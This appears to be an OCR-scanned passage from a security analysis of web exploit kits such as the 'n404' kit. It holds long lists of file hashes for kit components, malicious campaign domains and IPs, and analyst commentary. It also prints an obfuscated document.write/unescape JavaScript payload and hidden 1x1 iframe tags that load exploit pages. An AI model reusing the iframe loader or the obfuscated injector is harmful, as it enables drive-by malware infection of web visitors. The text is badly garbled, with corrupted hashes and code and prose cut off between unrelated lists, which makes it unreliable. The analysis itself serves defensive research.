38dbd288620c801ea083139b4eflcfc2 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
o1.gif 
38dbd288620c801ea083139b4eflcfc2 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pe.gif 
5c359dd05ae0be539b2d428c767269a3 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg.gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pn.gif 
38dbd288620c801ea083139b4eflcfc2 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps. gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
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Kscript>docunent -write(unescape (“S3cZ53Z43Z5 224925 OZ5N%2 OZUCSU1ZMOSU7 SS SSN IGN 7 SUS S32 24 4aZ6 147 6% 
61%53%63%72%69%7 B27 4%22%30%66%7 56 OLHI%S74%69%6 FSH OS2 OZ64Z6N46 9%6.aSH6%6 9%7 1Z6CLHIS2BS7 2%7 247 2%29%7 
b%76%61%72%2 0%7 4S65%60%7 O430%22%22%3b%2 0% 7646 1%72%2 0%63%6 3%6323d%E3 H43b %2 0% 7 6%6 127 2%2 O46 F 67 5%7 Head 
%22%22%3D%76%61%7 2%2 0%7 3%7 4S 7 2%3d%7 2%7 2%7 243D%6CSZ9d%73%7 4%? 2% 20S6CS65%60%6 7 7 NSO8SIDS7 7 SO8%69%6C% 
65%28%63%63%63%30%30%73%7 NS7 2%20%60%65%60%6 747 46 8%2d%3 1%29%7DS7 746846 9Z6CZ65%28%7 39%7 NS7 2420263246 
826 1%72%41%7 4Z28%6 3%63%63%29%21%30%2 7S29%2 72 29%7 U%65Z60S7 BZ30%7 NL65%60%7 OF2D%7 3% 7447 2%20%63%68%61 
%7 2%41%74%28%63%63%63%20%2D%29%3D%63%63%03%2DS2DZ3D 66 F 47 5 %7 NSIIS6FS7SS7NS2DS53 G7 4S7 246 9ZHESO7S2E% 
66%72%6 F%60343%68%6 1% 7 2443%6 F%64%65%28%7 046147 2%7 336 5S49S60%7 HS 28% 7 4ZO5 46% 7 O420%31%36%29%20%98%d 
6%29%3D%74%65%60S7 043d%22%22%3b%7 d%64S6 F363%75%60%65%60%7 NZ20%7 7% 7 2%69%7 NZ6SS28%6F S75 %7NS29%3bS7d 
SICE2FSSISUBTS AHS OFS NBEO") ) ;dmij Fiqlm("92)BE)CA)C3)C2)76)CE)C3)C2)C4)C9)9G8)CC)93)78)CB)C8)CK)9 
6)C9)B9)BE)BB)C3)B7)C9)83)C3)BF)B9)C8)C5)C9)C5)BC)CA)83)B9)C5)C3)98)CC)C3)C2)78)9%)63)68)63)68)92 
)BE)BB)B7)BA)94)63)60)92)C5)B8)C6)BB)B9)CA)76)BF)BA)93)78)AC)AS)AZ)AS)BB)C4)BA)BB)C8)78)76)B9)C2) 
B7)C9)C9)BF )BA)93)78)99)A2)AD) OF )9A)98)87) 86) 86 )8D)88)99) 9B) 99)83)8E)99)99)87)83)87)87)9A)87)83)4 
F )8E)8C)9B)83)86)86)97)86) 99) SF )8B)8B)98)8A)88) 9B) 78)94)63)68)92)85)CS)BS)CB)BB)B9)CA)9%)63)60)92 
)C9)CA)CF )C2)BB)94)63)68)CC)B2)98)88)76)D1)76)B8)BB)BE)B7)CC)BF)CS)C8) 96) 76)CB)C8)C2)7E)79)AC)AZ) 
A2)A8)BB)C4)BA)BB)C8)7F)91)76)D3)63)68)92)85)C9)CA)CF )C2)BB)94)63)68)92)85)BE)BB)B7 )BA)94)63)66)6 
3)66)92)B8)CS)BA)CF)94)92)BA)BF )CC)76) BF )BA)93)78)C3)CF)9A)BE )CC)97)78)94)92)85 )BA)BF CC )94)63)6E 
)SF)63)68)92)C9)B9)C8)BF)C6)CA)76)C2)B7)C4)BD)CB)B7)BD)BB)93)78)AG)B7)CC)B7)AY)B9)CS8)BE)C6)CA)78) 
94)63)660)5F )5F )63)66)5F )BC)CB)C4)B9)CA)BF )CS)C4)76)C6)BA)CB)CS)C2)B9)CF)CG)7E)C8)BF)C4)C1)CF)BD)A 
7)82)76)BC)C3)C4)C3)CA)C1)D6)B7)7F )63)68)5F )D1)63)66)5F )5F )CD)BE)BF )C2)BB)76)7E)C8)BF)C4)C1)CF)BD 
)87)84)C2)BB)C4)BD)CA)BE)86)88)92)BC)C3)C4)C3)CA)C1)D0)B7)7F )63)60)5F )5F)C8)BF)C4)C1)CF)BD)87)76) 
81)93)76)C8)BF)C4)C1)CF)BD)87)91)63)68) SF) SF )C8)BF )C4)C1)CF )BD)87)76)93)76)C8) BF )C4)C1)CF)BD)87)9 
4)C9)CB)B8)C9)CA)CS8)BF C4) BD) 7E)86)82)BC)C3)C4)C3)CA)C1)D6)B7)85)88)7F)91)63)66)5F )SF)C8)BB)CA)CH 
)C8)C4)76)C8)BF)C4)C1)CF)BD)87)91)63)68)5F )D3)63)66)5F )63)68)5F )BC)CB)C4)B9)CA)BF)CS)C%)76)CC)CD) 
C3) BF )C7)BE)CE)CB)7E)7F )63)60)5F )D1)63)66)5F SF )CC)B7)C8)76)C2)BC)BB)CH)CG6)76)93)76)86)CE)86)B9)9 
6)B9)86)B9)86)B9)91)63)66) SF )SF )CC)B7)C8)76)B8)CE)B7 )C3)CD)BD)BC)76)93)76)CB)C4)BB)C9)B9)B7)C6)BB 
)7E)78)78)CB)S8F )86)8F )86)7B)CB) SF )86)8F )86)7B8)CB)8B8)8A)BB)BS)7B)CB)8D)8B)8E)B8)7B)CB)8E)BS8)89)B9) 
7B)CB)89)8B)8D)8A)7B)CB)86)89)8D)8E)7B)CB)8B)8C)BC)8B)7B)CB)8D)8C)8E)BS)7B)CB)86)89)88)86)7B)CB)8 
9)89)BC)8B)7B)CB)8A)8F )B9) SF) 7B)CB)B7)BA)8A)87)7B)CB)BA)BS)89)89) 7B)CB)86)BC)89)8C)7B)CB)87)8A)Ba 
)BB)7B)CB)89)S8E)88)8E)7B)CB)8D)8A)BC)88)7B)CB)B9)87)86)8E)7B)CB)86)BA)B9)B8)7B)CB)BA)B7)86)89)7B) 
CB)BB)B8)8A)86)7B)CB)89)B88)BB)BC)7B8)CB)8D)8B)BA)BC)7B)CB)8B)BB)BB)8D)7B)CB)8B)BB)S8E)B8)7B)CB)86)a 
9)88)8A)7B)CB)8C)8C)BA)BA)7B)CB)86)B9)8E)BS)7B)CB)S8E)B8)8A)BS)7B)CB)87)B9)8B)BB)7B)CB)BA)BA)86)89 
)7B)CB)86)8A)8E)B8)7B)CB)86)89)8E)B8)7B)CB)B9)89)B9) 8B) 7B)CB)8D)88)8D)8B)7B)CB)8C)BA)8C)B9)7B)CB) 


at the Bank of India. Is this a newly developed attack kit, or a modification of another popular 
one? Further attack clues will definitely indicate the second, namely that’s it’s a modification. 
In respect to this kit, it returns a 404 error within which is the obfuscated javascript, thus we 
have a fast-flux oriented kit aiming to diversify and include as many infected nodes in the attack 
process to improve its chances of infecting the host while the campaign remains in tact. The 
malicious URLs structure is again static just like Storm Worm’s, and is in the following format 
n404-(number from 1 to 9).htm where each page contains a different malware. 


Several more n404 exploit kit campaigns are currently active at the following URLs : 


msiesettings.com - 81.95.148.14 


winmplayer.com 
smoothdns.net - 81.95.148.12 
protriochki.com - 81.95.148.14 
susliksuka.com - 81.95.148.12 
uspocketpc.com - 81.95.148.13 


The exact campaign URLs : 


- mymoonsite.net/check/versionml.php?t=141 
1028 


ae548aa692ef71a331lafe943026e111d 
pw.gif 
6a3alfcO91aa71fc473277a02dccdd2c 
py. gif 
479edce4532bd36f766bd29a346ee0c2 
qa.gif 
6ad5b83645bf557fe570894f453f432a 
re.gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
rs.gif 
38dbd288620c801ea083139b4eficfc2 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw.gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb.gif 
C41690739c4f92af9e065e81690a2356 
sc.gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se.gif 
63ff75c06900689a5d43ab931bc82662 
sg.gif 
d89f586fb81c9a9cf9cdf95013F73908 
sh.gif 
38dbd288620c801ea083139b4eficfc2 
si.gif 

4f311a4b0a39db339be7 4a2f354d3799 
sj.gif 
38dbd288620c801ea083139b4eficfc2 
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sk.gif 
01d603424483cf66ca867ba0flc9fec4 


SI.gif 
a8alca018798069590c0f8cb5796fc65 
sm.gif 
6330955519623fed6262d632956c66e0 
sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
so. gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
st.gif 
d0889a94d96bee4541ea661e7e3b6626 
sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz.gif 
6ec7660bea2f1l8ffc26555f43d0f6ad8 
tc. gif 
5d456951dcf4eb341117c87857a20848 
td.gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th. gif 
b525712cc1014c12071aa555b29d9654 
tj.gif 
ac1c06b195a17e9408472c15a5c086cd 
tk.gif 
38dbd288620c801ea083139b4eflcfc2 
tl.gif 
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38dbd288620c801ea083139b4eficfc2 


tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tp.gif 
e€668c8b8a6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt.gif 
87decec956e1fc484b1a8b1716326b25 
tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua.gif 
1cc325bedc5df0920efedda54a184fdc 
ug.gif 
174636bd284c8d7f06638767bb84b6fd 
uk.gif 
39526cd54b55fba7910702d6a0061c90 
um.gif 
4546517ece394c3c8a22f8b7ed54ad81 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy. gif 
275a0eccdca2720e84afa23054b5d371 
uz.gif 
9bb72b0eaaee6bab1de26f9b53624a86 
va.gif 


4fccba188125599f6448f8e0b71d0677 
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vc.gif 
bc56207f7daf99ac171e85c3ca85e43b 


ve.gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 
5f89b155213d1c29181d06da33a974f8 
vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
vu.gif 
b1924aea4986245f3c6e770e8de1b843 
wf.gif 
38dbd288620c801ea083139b4ef1cfc2 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8s 
ye.gif 
ee7fb77f702f0182de807f188138a152 
yt.gif 
38dbd288620c801ea083139b4ef1cfc2 
yu. gif 
6a7e5foc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zm.gif 
al6bced0ab9ae9b874d4c0c35c36b918 
zr.gif 
c66f4e607dbc3158243360d69856f827 
zw. gif 
8d31cf8ee73d6c4e8fdd3c8382d01549 
0.png 
7174b474d5c1b02516e0746600d0c546 
1.png 
7394686333e998d21f9d462d6079ed21 
10.png 
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d2ccb649279d017a6b050b1379489ff0 
11.png 
6437a790102cb820370ae79e1f040d8e 
12.png 
c406a4cee5bd1f34a63f3b82b99celle 
2.png 
37f5fbbcd43ae3b1b2b3e63cfele544c 
3.png 
9534784732bac3169c55f32864cc922e 
4.png 
2f2dec9e16649a09b5128586bde2e689 
5.png 
3e17c7ab5b38a7fbod5a389231bca679a 
6.png 
de7f0ae008bf6cca7bddf2a52478cf6d 
7.png 
€321983410113b6591ebe4a0835cf052 
8.png 
72f90fe46fad9e625ccfb6eaddcbd88b 
9.png 
9b1fbf932fbb637785cc36596095935c 
darkgrey.css 
71689180123a965ad2f9b2e1c8db27cd 
footer.php 
1d3a820914ed56cbd792e581948239a6 
header.php 
e84c3ada73453dd507da394447347346 
OOOU00.htm| 
d34b81a3cf4c4177338e92f453fbe9b3 
86.swf 
55flbb7ede53eb25324d7465e302e371 
end.swf 
2ce9e9d491408fc77d3c54d60ee54db1 
fxxx.htm aad6e90916451ace99bd568640f5201c 
hudie.swf 
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3713c08dc4b8c4be1616ab9a3b68e790 
top.swf 
f64ab20da5742d7877f80fc246d38dcd 
0.gif 
ca20d33df250e7c70be0f542e81b9415 
L.gif 
a9a4eb467040316f5188e65e0ea31fe2 
2.gif 
b40027f65d7a7e73c2137772f45a8538 
2005119124127.jpg 
lbe7dfcf3bc8f139df77d9c059496515 


3.gif 
661c839e7ed59b935d3a8a5a2f6e6d31 
4a _r1 _cl.gif 
bae7598c4b7123214f61779801bb2abf 
4a _12_cl.gif 
06ee4c0801e59d12e44d1bea48efbbfc 
4a _12_c4.gif 
5b0c1la81baa6624e0f6be5d1cfb7elaf 
4a _12_cS.gif 
Obec27172881c7bebdb13b60409da899 
4a _12_co.gif 
a57c223a04d62e2ffc6d1lb2c9ca99e2a 
4a _13 _c6é.gif 
afd6bfe9ba5b61fb8dc57b43637fca24 
4a _13 _c8.gif 
38b09c47be235096e04abaebabbf34e0 
4a _1r4_c7.gif 
ec9a6909c62921b49f2e7e9b8c35d12F 
4a _15 _cSgif 
904ce390cfe52b7239908bd21274bdf1 
4a _1r6 _c2.gif 
lcaff1393065ecb3596fbd576409b9d2 
4a _r7 _c2.gif 


5ba0d18c57897fcd39613a46379ee289 
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4a _18 _c7.gif 
6f2a67342a5a838f2a4201c51db69a10 
4a 19 c3.gif 
123d2a090b8c670b2226486d680664e5 
7.Qgif 
7bea37f44b654963fc9Cc275ed6ea2822 
arrow02.gif 
eb7a49659bc6564b868a823942d4b4b4 
bg.gif 
b95dbal10fa251e344db7180be136aadd 
but. gif 
5b59a9368e2ca4799d3fe708c5f9F07F 
CSS.CSS 
23903695214bdf2e26b035e16f9bd110 
end.gif 
47b26edf54cc896fe2d630bd4045d350 
m4.gif 
313af03ca8d3bddf7c03b597571cf6f1 
menu.gif fdd75ac9354445daf86070feb07f5a97 
pa.gif 
87460e3f0d74ef2043687af8665592a9 
scroll.html 
e77a59ebdc588b30741e5d5d2e639baft 
scroll2.html 
5c11b1956ddb28f60c78997fa45a9f29 
spacer.gif 
221d8352905f2c38b3cb2bd191d630b0 
spacer.html 
€060431c4c49149613cfe2a34857eb36 
spacer 002.gif 
221d8352905f2c38b3cb2bd191d630b0 
topl r10_c2.gif 
f6b822b078dd2ceec621c2313ea9f50c 
topl r10_c4.gif 
05c47ae56fcada8c456896c00fd518f2 
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topl rl _cl.gif 
732c631df9279fc9f4d6347b4c43f1lbc 
topl _rl_c6.gif 
79580a85a91dab4a3e07ea01720990a8 
topl _rl1_c/7.gif 
c011fb357b58b105fe3662dela6b9ce6 
topl _r2_cl.gif 
7b60045af9027bf4495e4c4bf899 7fd6éd 
topl _r2_c6.gif 
02635ee765a0882af4el1e03e47652c4e 
topl _r2_c8.gif 
fca7bd023d599430ccfbc251b829f058 
topl _r3_cl.gif 
f9886d69f6af06d8e3a8f2b88babadf2 
topl _r3_c3.gif 
c7ec16a6a94c749cffe2e9c1a540326f 
top1 _r4_c2.gif 
4f32bb0da96F7592e0d18c97fc2f3a8a 
top1 _r6_c5.gif 
13fcea509784f1113e503f40e74340f6 
topl _r7_c/7.gif 
b6534db5ebe8d7c9ab690f4bc4dd60b0 
topl _r8 _c2.gif 
81e59e9f4ab67c2ad8936020f2830615 
topl 19 _ c2.gif 
1212a9ec01916bf83b0b25e050dedal11 
topl 9 _c3.gif 
a7322617d6625d5ec094e829e723d0ec 
xiaozhang.jpg 
65f0e4f74ed1f44b553ee94db584f4ac 
a.html 
Ob2a6e4cbbb4eledsc2c2baea38eb6lfcb 
def.html 465eb6c3acba7134cb3e7e6d3266665c 
menu.html 


a48e7c823ce60b6dc04bb164e25799cc 
10260 


2005102195838.jpg 
b062bcb9bcf169f38f94232e301d4169 
20051031195014.jpg 

ee5937 7befff25 7ef295bdbc265d545e 
20051031203322.jpg 
841b8ca5a2a855dadec91ldea88cdcc7a 


200511318217.jpg 
€6810ba05ef13d6276f34486025496b6 
2005113183051.jpg 
9f526345856b92ff8b506b14abalf0dc 
2005113183611.jpg 
acb46bc4e5724ac8a2e823e6a6d9599f 
2005113184540.jpg 
e3f37ef718721ead1e80246944e71c43 
200511319019.jpg 
adc06554e45fde4a47d519f85503b038 
2005113191455.jpg 
248alde98ba4fbf3a33bcb5f55b370bc 
2005113192855.jpg 
0d11638c4628d507b50c5a182335e2eb 
200511319854.jpg 
324ab7238c43abc5a192643db5c5a02f 
2007529165627.jpg 
67019e8c4827c182daaf85ddf7439867 
a.html 


Ob2abe4cbbb4ele5c2c2baea38eb6lfcb 

abc.html a009230a656e4348b1cc01ab00739685 
menu.html 
a48e7c823ce60b6dc04bb164e25799cc 
2007530151056.jpg 
55eb5694c5f19529cbe25799ec43e458 
2007530162850.jpg 
5d28cfab2a734264923c72c297d82c54 
2007530163748.jpg 
5fdda4bf5c8d64734cbb6fc972c7475f 
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2007530164551.jpg 
9c6f638217c32de15c2179d0bfc47bcb 
2007618173944.jpg 
€8a30c3867b32329df892d7841071680 
2007618174238.jpg 
a7dbed7c0a8e161d797045b704ac95cb 
2007618174533.jpg 
56a829f39a7d52c9cbba0a37e892d933 
2007618175012.jpg 
32¢1892a678b703dc94db7ad47b4e1f0 
2007618175255.jpg 
57fea248b3bab3f1b18b0c94ea7845e2 
2007618175527.jpg 
939eaa6152b331a27f409c6bce650132 
admcp.php 
2d10e1c2c94ed46067b6a21a149f092c 
index.php 
628b323ad7b52c261cada07a7372686f 
load.php e8e4612d6c285f9df74b556e0555d29c 
pdf.php 
c5b42246556953ce51cce6abecf5476c 
README.txt 
114469d38f5d92e8ae4898Ff7204905ec 
sploits.php 
06bc402a3e173d7a75e7c59fc3719202 
_install.php 
5ffc0O9d71d7ce2bbf241f4be1c51b14c 
config.php 
f8b89d757b88f6e76b8b65e60f4759cc 
GeolP.dat 
f3f153e5ac6f252335383f1f82a67a71 
geoip.php 
5b6e59bc6d5eac1dd3872981c0fee0cc 
options.php 
2c0d86d66c92eb64ad70a2f6e0c94bc0 
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mymoonsite.net/check/version.php?t=15 


mymoonsite.net/check/n404-1.htm 
n404-(number from 1 to 9).hAtm 


- uspocketpc.com/check/n404-1.htm 
n404-(number from 1 to 9).htm 


- s75.msiesettings.com/check/versionst.php?t=75 
s75.msiesettings.com/check/n404-1.htm 
n404-(number from 1 to 9).hAtm 


- S99.winmplayer.com/check/n404-1.php 
n404-(number from 1 to 9).hAtm 


- smoothdns.net/check/n404-1.htm 
n404-(number from 1 to 9).htm 


- protriochki.com/check/n404-1.htm 
n404-(number from 1 to 9).htm 
- susliksuka.com/check/n404-1.htm 
n404-(number from 1 to 9).htm 


<iframe src=. /n4¢04-1.htm width=1 height=1></iframe> 

<iframe src=. /n404-2.htm width=1 height=1></iframe> 

<iframe src=. /n404-3. htm width=1 height=1></iframe> 

<iframe src=. /n404-4,htm width=1 height=1></iframe> 

<iframe src=. /n404-5.htm width=1 height=1></iframe> 

<iframe src=. /n404-6.htm width=1 height=1></iframe> 

<iframe src=. /n404-7 Atm width=1 height=1></iframe> 

<iframe src=./n404-8.htm width=1 height=1></iframe> 

<iframe src=. /n4¢04-9. htm width=1 height=1></iframe> 

What makes an impression is that it’s relying on as many possible malware infections as pos- 
sible, thus visiting a central campaign site such as mymoonsite.net/check/version.php?t=158 
results in all the n404 malicious pages within the domain to get automatically loaded via an 
IFRAME, and as you’ve successfully guesed, they all contain different types of malware. De- 
spite that javascript obfuscation is often used to hide the real location of the exploit or binary, in 
this campaign each and every n404-1.htm obtained from all domains has the same checksum, 
therefore the files at the different domains are identical - at least so far : 


File size: 10636 bytes 


MD5: 45594ef52a9f53f2140d4797826156ff 
SHAI1: 7c4f7d183dfaf39410902a629b13ae5112b847f0 
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style.css 
08e89942c189cd7d152010a8a5bcae30 
clear.gif 

9ebec9a08b7fbcf2 7fff7f18d43224fc 
country. gif 
22575bbcb655750c1f428ce9da200ecd 
logo.gif cdacaa9ee46felfc67c7c85f4f3dd6d0 
logout.gif 
236b45d7ebcaeal6cb9bb44649216518 
referer.gif 
3879c3ec92e821ded7f74c0438bd5f77 
statistic.gif 
050bc8ae15bd6873d9485323fe0e60d2 
Thumbs.db 
69f68b1d23943079ee6c5beaa3923ble 
ff.php 

ea62e2debae7 7f63546b9e9df9f9b17F 
ie.php 
€612a581165e09a195b6b86dd1927a70 
ie7.php 
91f72100fa43b158bf92a84ae852798b 
op9.php 
6ca7a2d80ca2fc4e8802b7c7cf8c4d51 
fullstat.cgi 
073cd4150165cfb4bbc8d1df3cO0c4fcf 
fullstat.htm 
7f06c18ccbedfabd957f72dda5cd7257 
htagen.exe 
24d70abc9aaca87bf7ce5dd7725b0f42 
htmlgen.exe 
876ea0ac752c33d958791eff5d627258 
ieQ601.cgi 
a6d4649929f9b00beaeeb726380f9def 
ie0601a.jar 
f54b2eef0955f5cd9f5f3162cb23bae0 
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ie0601c.htm 
1eal7d6242603cc3ef9ad2d9fa01f64f 
ie0601d.htm 
e7da09e234a2fe024cbdbec555c72a6e 
jscode4 O.hta 
1l6ee9ebebca4d98ced3032c2a0376457 
ms05-002.exe 
08e1824c0c1333738c74551c92e5e986 
ms05-054.exe 
bcb7be78a7e9a37d6a42b228a6ec95cd 
ms06-001.exe 
17491ladd1cdceeaa57c148e639e67b05 
multigen.js 
e53778b2cabd6e10226b795be560e31a 
Readme !!!.txt 
8301f0c3falbd5732abf873f2d4bc3ba 
shellcode.dll 
0e731730211ac574488e78581a01a3b5 
File _id.diz 
al6f8e46a6d6edf1122663f60cd7787e 
Key.txt 
5ad1971b2345233643b6d161a389d8ea 
License.txt 
d40672904a44c2dfébbbabc0d3d203a4 
README.TXT 
aaalb6ea4319b123eb35c631a6d71951 
SETUP.EXE 
b08de6d94a14a4762c1bb788f41249d1 
VERSION. TXT 
f7eaac67799cf39cd9c863779042clac 
wow.zip 
665b53f644929b74d4ad8df503a84311 
404.php 
Ofba82b94a3a2c8cb111284e9280b2da 
432.js 
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8d85be6217654816ede928b3e7a9fcle 
config.php 
fa6666945870c5fb9005ae658e1f90al 
crypt.php 
2a67a930f06877586318a6ce93af50b2 
DSjjgher.DIR 
4a0cOd3cf2b937eb1la6c512c9ffb0f9a 
exp.php 
859391ac3fc8acd1826714bd297022f2 
FrEWgRr5213pdf 
36daac72e48ef3258b38cabeff8cebec 
functions.php 
da8d9434b46e4ad47d0a6831429bc1d2 
GeolP.dat 
d2845d608ca568665644b2ced17fbebc 
geoip.php 
10a02051a466315ea94fc41a97 733621 
index.php 
3f4ad7f0169a2aecb35a0ccd355804b3 
install.php 
0ce86a695589041e7a4140657c1a31b9 
Java Sun Update 6.22.jar 
6551101ba4ed7cc4d648b0342970b2a8 
Java Sun Update _6.class 
5d3a9ec8d02077189fe2d72eead50d9d 
pay.php 
d0f349fbad86c745f4e428f3c58eab0a 
pdf.php 
79c81c008e7595e2fadedc14871b5e43 
plug.jar O066fe870ecc274d1f33ba0df878c281e 
plugin.jar 
94bef4df7375550a2e9255acalb52908 
readme.txt 
73e907bcO0aced87c42a7cb06b48df825 
robots.txt 
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9152d7f1724ed8fbcd2e0c87029f193c 
sellrs.php 
d53e27f740a1f550c57aa68a9ad655bc 
site.php 1402e03ff7d1d673bcc11712c923al12b 
stat.php 8b6f8aadf25b4622b92e1677d798eca6 
1.png 

23a117d83e57ada3929c3847e4968f09 
clear.gif 
90a2c0d86f689b13ada38d107741595d 
country.gif 
e08973ae59ef120015a9f0431854da48 

file.gif f6176belecaled202e34604ac7aad0e3 
form _inputtext.jpg 
9325fle5f5f031b93981leac75c4abdc7 

heading _background.jpg 
255fed7ce5a0c90aeb91c5720ac3bc31 

ifr.gif 

59b2d0cd717eb6800e5c4a495ec69b83 
index.css 
200b4d32ddc5d08023f7be1378b1b014 

logout. gif 
O00ebcelede05e9300372bef332464c8d 
main.gif f2d459dd05d1435983f70c1835a99d31 
referer.gif 
4ac8345994b37a558b71e716ce7f3fic 

sell.gif 283b902067640b4a065bead6823f3948 
submit.jpg 
601a28af4f526dcb4c40al1f6176afibe 
Thumbs.db 
b8af20c4171fcf4804ce881a9ae8deab 
wrapper-a.jpg 
dcc854921eeff40d08b1dd08e57c1957 
wrapper-b.gif 
42fc1969abd5a967ed26f4785f2545b7 
load.dat ffedc9fd15d604c83ebd91d6c34eeccl 
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ff add.php 
6fcfb0b3097c5160a6867f160deaf83d 
chrome.manifest 
780b66ed3eb7fa68cfd2d1d9d1148dfd 
install. rdf 
fc40a637d73955045b513a6e6474756e 
dihelper.js 
9dcb8cd8d4f418324f83d914ab4d4650 
dihelper.xul 
afc0e476b935cd3d49fd4146b9fc9f54 
404.php 
Ofba82b94a3a2c8cb111284e9280b2da 
432.js 
8d85be6217654816ede928b3e7a9fcle 
config.php 
fa6666945870c5fb9005ae658e1f90al 
crypt.php 
2a67a930f06877586318a6ce93af50b2 
DSjjgher.DIR 
4a0cOd3cf2b937eb1la6c512c9ffb0f9Ia 
exp.php 
859391lac3fc8acd1826714bd297022f2 
FrEWgRr5213pdf 
36daac72e48ef3258b38cabeff8cebec 
functions.php 
da8d9434b46e4ad47d0a6831429bc1d2 
GeolP.dat 
d2845d608ca568665644b2ced17fbebc 
geoip.php 
10a02051a466315ea94fc41a97733621 
index.php 
3f4ad7f0169a2aecb35a0ccd355804b3 
install.php 
0ce86a695589041e7a4140657c1a31b9 
Java Sun Update 6.22.jar 


10267 


6551101ba4ed7cc4d648b0342970b2a8 

Java Sun Update 6.class 
5d3a9ec8d02077189fe2d72eead50d9d 
pay.php 

d0f349fbad86c745f4e428f3c58eab0a 

pdf.php 
79c81c008e7595e2fadedc14871b5e43 
plug.jar O66fe870ecc274d1f33ba0df878c281e 
plugin.jar 
94bef4df7375550a2e9255acalb52908 
readme.txt 
73e907bcO0aced87c42a7cb06b48df825 
robots.txt 
9152d7f1724ed8fbcd2e0c87029f193c 
sellrs.php 
d53e27f740a1f550c57aa68a9ad655bc 
site.php 1402e03ff7d1d673bcc11712c923al12b 
stat.php 8b6f8aadf25b4622b92e1677d798eca6 
1.png 

23a117d83e57ada3929c3847e4968f09 
clear.gif 
90a2c0d86f689b13ada38d107741595d 
country. gif 
e08973ae59ef120015a9f0431854da48 

file.gif f6176belecaled202e34604ac7aad0e3 
form _inputtext.jpg 
9325fle5f5f031b93981leac75c4abdc7 

heading _background.jpg 
255fed7ce5a0c90aeb91c5720ac3bc31 

ifr.gif 

59b2d0cd717eb6800e5c4a495ec69b83 
index.css 
200b4d32ddc5d08023f7be1378b1b014 
logout. gif 
O00ebcelede05e9300372bef332464c8d 
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main.gif f2d459dd05d1435983f70c1835a99d31 
referer.gif 
4ac8345994b37a558b71e716ce/7f3fic 

sell.gif 283b902067640b4a065bead6823f3948 
submit.jpg 
601a28af4f526dcb4c40al1f6176aflbe 
Thumbs.db 
b8af20c4171fcf4804ce881a9ae8deab 
wrapper-a.jpg 
dcc854921eeff40d08b1dd08e57c1957 
wrapper-b.gif 
42fc1969abd5a967ed26f4785f2545b7 
load.dat ffedc9fd15d604c83ebd91d6c34eeccl 
ff add.php 
6fcfb0b3097c5160a6867f160deaf83d 
chrome.manifest 
780b66ed3eb7fa68cfd2d1d9d1148dfd 

install. rdf 
fc40a637d73955045b513a6e6474756e 
dihelper.js 
9dcb8cd8d4f418324f83d914ab4d4650 
dihelper.xul 
afc0e476b935cd3d49fd4146b9fc9f54 

Yang Pack.zip 
6623eae72234efe5b16fd64cfd26feef 
config.php 
75625ae74b601add5ce3c0c0d2191c2c 
dump.sql d7a999c4d6568f21e17f65ae191e0363 
funcs.php 
ab07cdf10d47e269eb5ae7d80cdb6f3e 
functions.php 
c9ece09e290898b3297ela70bc40461b 
hosttest.php 
8926dd5ce4e18693b22e0dc9bdd65b7a 
index.php 
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0134a3169160c75b85a30ca377a489cf 
load.php 8ae735bb54445bcfb6931blefdb0b2e2 
frame.php 
c96fe5fe847807005b563ea06d801b66 
index.php 
clba8cb61f715f3e218c153alfe6cde9 
login.php 

3222e12b8be2a86b2a07 3f8f81148610 
sample.php 
1dc084aa6ab6bbd0716b1b2db17104f8 
serv.php 9daf6ée13b9b9000f7be4410c67ec3698 
desktop.css 
6677a654ec2bc9dfab30be252f00217b 
examples.css 
5d84d55bce8a46b8af80d77398dc9beN 
ext-all.css 
€1428cd4511bedc9ac48784e4ff12c9f 
index.html 
81e1d982bf67bb23723cdfcalda72650 
module.css 
5351c23643ce1609bbd4f6e391c839e4 

Src.cSs 

3e0f38b140fe535e00117849f18be3ca 
about.gif 
22a2534d40f5caacce6e57bbd5ala6bab 

bg.png 

fdfbb3b5794ee0f686b5d6d996349bea 

bgfr.png a2f9a8debf2135a3b7c9e8al6d97ee55 
brow.png a9776481865eb854cdd81762b390e1d8 
browm.png 
00f5b3e4c764804a39d2fe4342d052bc 
desktop.gif 
bc00f3e753c31a0023819f95c5419ccd 

f.png 

ff267ae82d529941727f88965ba66846 
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frame.png 
18740720db010e5cb1d69c797ab73d90 
ftp.png 
5d95987bf1f3cea801519d22656f544b 
geo.png 
